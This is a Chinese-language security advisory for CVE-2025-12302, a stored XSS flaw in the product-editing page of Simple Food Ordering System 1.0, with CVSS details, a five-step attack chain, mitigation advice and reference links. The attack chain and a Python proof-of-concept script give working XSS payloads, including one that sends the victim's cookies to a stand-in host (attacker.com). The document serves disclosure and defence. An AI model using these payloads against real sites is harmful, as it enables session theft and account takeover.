CVE-2025-12302 Simple Food Ordering System跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-12302

漏洞类型

XSS

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

code-projects Simple Food Ordering System 1.0

漏洞概述

CVE-2025-12302是code-projects团队开发的Simple Food Ordering System 1.0版本中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于编辑产品功能页面（/editproduct.php）中，攻击者可以通过操纵产品名称（pname）、产品类别（category）和价格（price）等参数，注入恶意JavaScript代码。由于这些输入参数在提交后未经过充分的输入验证和输出编码，恶意脚本会被存储在服务器端，当其他用户访问相关页面时，嵌入的恶意代码会在其浏览器中执行。攻击者可利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或传播恶意软件。由于该漏洞的利用需要用户交互（UI:R），攻击者通常需要诱骗管理员或工作人员点击特定链接或访问包含恶意内容的页面。漏洞的CVSS评分为4.3，属于中等严重程度，但考虑到实际攻击场景，可能导致敏感信息泄露和账户接管等严重后果。该漏洞已于2025年10月27日公开披露，漏洞利用代码已在互联网公开，强烈建议受影响用户立即采取修复措施。

技术细节

该漏洞属于存储型XSS（Stored XSS）漏洞，存在于Simple Food Ordering System的editproduct.php文件中的产品编辑功能模块。漏洞产生的根本原因在于应用程序缺乏对用户输入的充分验证和输出编码。具体来说，当用户通过editproduct.php页面修改产品信息时，系统直接接收并存储来自pname、category、price等参数的用户输入，而没有对这些输入进行安全过滤或HTML实体编码。攻击者可以在产品名称、类别描述或价格字段中插入恶意JavaScript代码，例如：<script>alert(document.cookie)</script>。当管理员或其他用户查看产品列表或相关页面时，浏览器会解析并执行这些存储的恶意脚本。由于该系统是食品订购管理系统，管理员通常需要频繁访问产品管理页面，这使得攻击者有更多机会窃取管理员的会话凭证。攻击者获取管理员cookie后，可以进一步进行账户接管，甚至在服务器端执行更高权限的操作。值得注意的是，该漏洞的攻击复杂度较低（AC:L），攻击者只需构造特定的HTTP请求即可利用，无需特殊权限或高级技术能力。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标系统使用的Simple Food Ordering System 1.0版本，并定位到存在漏洞的editproduct.php文件。通过分析URL结构和参数名称，确定可被利用的输入点（pname、category、price参数）

STEP 2

载荷构造

攻击者构造恶意XSS载荷，可以是简单的弹窗测试代码<script>alert('XSS')</script>，或者是更复杂的窃取cookie代码，如<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

STEP 3

漏洞利用

攻击者通过HTTP POST请求向editproduct.php提交包含恶意脚本的产品信息。由于输入验证不足，恶意代码被存储在数据库中，而非被过滤或转义

STEP 4

触发执行

当管理员或其他用户访问产品列表页面或相关管理界面时，浏览器从服务器获取包含恶意代码的产品数据，并将其解析为HTML执行，从而触发XSS漏洞

STEP 5

数据窃取或进一步攻击

成功执行恶意脚本后，攻击者可以窃取用户会话cookie、劫持账户、进行钓鱼攻击，或以被攻击者的权限在系统中执行更多操作。如果获取管理员凭证，攻击者可能进一步控制整个系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12302 PoC - Simple Food Ordering System XSS
# Target: /editproduct.php
# Parameters: pname, category, price

def exploit_xss(target_url, payload):
    """
    Exploit for CVE-2025-12302
    Injects XSS payload into product editing functionality
    """
    # Target endpoint for product editing
    endpoint = f"{target_url}/editproduct.php"
    
    # XSS payload - can be customized based on attack goal
    xss_payload = "<script>alert('XSS Vulnerability Detected')</script>"
    
    # Malicious payload with cookie stealing capability
    cookie_steal_payload = f"<script>document.location='http://attacker.com/steal?c='+document.cookie</script>"
    
    # Prepare POST data with XSS payload
    data = {
        'pname': xss_payload,  # Product name parameter
        'category': xss_payload,  # Category parameter
        'price': '99.99',  # Price can also be exploited
        'submit': 'Update Product'
    }
    
    try:
        # Send malicious request
        response = requests.post(endpoint, data=data, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] XSS payload sent successfully to {endpoint}")
            print(f"[+] Payload: {xss_payload}")
            print("[*] When admin views the product, the script will execute")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

def verify_vulnerability(target_url):
    """
    Verify if the target is vulnerable to CVE-2025-12302
    """
    verify_endpoint = f"{target_url}/editproduct.php"
    
    # Simple test payload
    test_payload = "<img src=x onerror=alert('VULNERABLE')>"
    
    data = {
        'pname': test_payload,
        'category': test_payload,
        'price': '0.01',
        'submit': 'Update Product'
    }
    
    try:
        response = requests.post(verify_endpoint, data=data, timeout=10)
        if test_payload in response.text or response.status_code == 200:
            print("[!] Target appears to be vulnerable")
            return True
    except:
        pass
    
    return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-12302.py <target_url> <action>")
        print("Example: python cve-2025-12302.py http://target.com exploit")
        sys.exit(1)
    
    target = sys.argv[1]
    action = sys.argv[2]
    
    if action == "exploit":
        exploit_xss(target, "<script>alert('XSS')</script>")
    elif action == "verify":
        verify_vulnerability(target)

影响范围

code-projects Simple Food Ordering System 1.0

防御指南

临时缓解措施

在应用层修复前，可采取以下临时缓解措施：1）限制普通用户访问editproduct.php等管理功能页面，仅允许授权管理员访问；2）在Web服务器层面配置输入过滤规则，对请求参数中的<、>、script等关键字进行拦截或转义；3）启用浏览器的XSS过滤器功能，虽然不能完全防护存储型XSS，但可以提供一定保护；4）加强对管理账户的监控，及时发现异常行为；5）考虑使用临时防火墙规则屏蔽对editproduct.php的访问，待正式修复后再开放。建议尽快应用官方发布的安全补丁或考虑替换存在漏洞的组件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12302
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12302
3 Details https://www.cvedetails.com/cve/CVE-2025-12302/
4 VulDB https://vuldb.com/cve/CVE-2025-12302
5 Link https://code-projects.org/
6 Link https://github.com/underatted/CVE/issues/21
7 Link https://vuldb.com/?ctiid.329974
8 Link https://vuldb.com/?id.329974
9 Link https://vuldb.com/?submit.676098